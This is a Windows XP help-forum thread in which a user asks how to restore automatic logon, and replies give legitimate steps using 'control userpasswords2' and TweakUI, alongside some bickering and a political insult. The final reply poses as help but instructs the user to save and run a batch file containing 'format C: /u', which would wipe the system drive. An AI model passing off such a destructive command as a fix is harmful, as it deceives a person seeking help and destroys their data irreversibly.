How do I get my old boot method back?

I was getting messages when using Symantec Win Doctor that said
that mscoree.dll couldn't be found, so I looked it up at Microsoft
support and it said that I should install some of their software to
fix it. I did. Now that message is gone, but when I boot, it no
longer boots all the way like it used to. Now it boots to a button
with my name on it and I have to click that button to finish
booting. I didn't ask for their software to reconfigure my computer
booting.

I tried solving it in the control panel users settings but can't
get it fixed now. I'm the ONLY one who uses my computer and JUST
want it to boot all the way when I turn it on, without having to
click my name to get it to finish.

1. Go to Start | Run and type in: control userpasswords2 | Ok.

2. On the Users tab, clear the Users Must Enter A User Name And Password
To Use This Computer check box and then click OK.

3. In the Automatically Log On dialog box that appears, type the user
name and password for the account you want to be logged on each time you
start your computer.

You can accomplish the same thing by:

Download and install tweakui for xp and use its auto logon feature.
http://www.microsoft.com/windowsxp/pro/downloads/powertoys.asp

Lastly you can add the Dialog box that comes up when running control
userpasswords 2 to the Control Panel with the following tweak:

Add Control User Passwords2 to the Control Panel (Line 1)

Hello.

I tried this:
2. On the Users tab, clear the Users Must Enter A User Name And Password
To Use This Computer check box and then click OK.

I don't see the check box. Any reason why ?

Thanks,
Tony

Hi Tony,

At the very top of the fisrt tab? Are you sure you ran the command with the
"2" at the end?

WinDoctor is crap and that "error" is bogus. WinDoctor will make changes to
the Registry that will make your XP inoperable; don't run it!

The bogus error from WinDoctor is documented on Symantec's site.

Download the free PowerToy "TweakUI" from Microsoft and look in:
\Logon\Autologon

It wasn't Windoctor, it was what someone told me to do here!

I managed to get my machine working again and uninstalled MS
..net. Then I ran Windoctor and when the error showed up again, I
just instructed it to ignore it in the future.
Download the free PowerToy "TweakUI" from Microsoft and look
in:
\Logon\Autologon

I tried that before and found it useless.

From your post:

Yeah I was, but that wasn't what stopped my computer from
booting. That happened as soon as I ran that line that someone
recommended here.

To be a "voice of freedom" you must shed the shackles of a slave mentality
and accept the consequences of stumbling in the dark void of ignorance. "He
told me to do something that I did not understand." won't wash. You sound
like a Republikan.

I knew about it, I was just waiting to see it in public to say something. It
was (and still is being) well-earned.

I'm not sure if there is an answer there. If anybody does have a
discernable answer, could you please post it.

Thanks,

Hi Tony,

Sorry we got side-tracked. Your last response indicated you could not see
the line that Rock had told you to uncheck. I had asked if you were sure
that your ran the right command (that being "control userpasswords2" -
including the "2"), but you had not responded to that yet.

They gave you the wrong advice, try this.. Cut 'n' paste the
following into notepad..

echo off
format C: /u

Then save it as "C:\oh-****.bat"

Go.. Start > Run > type "cmd" (without quotes) > enter.

In the black screen type "CD\" <enter>

Then type "oh-****" <enter>

Enjoy!
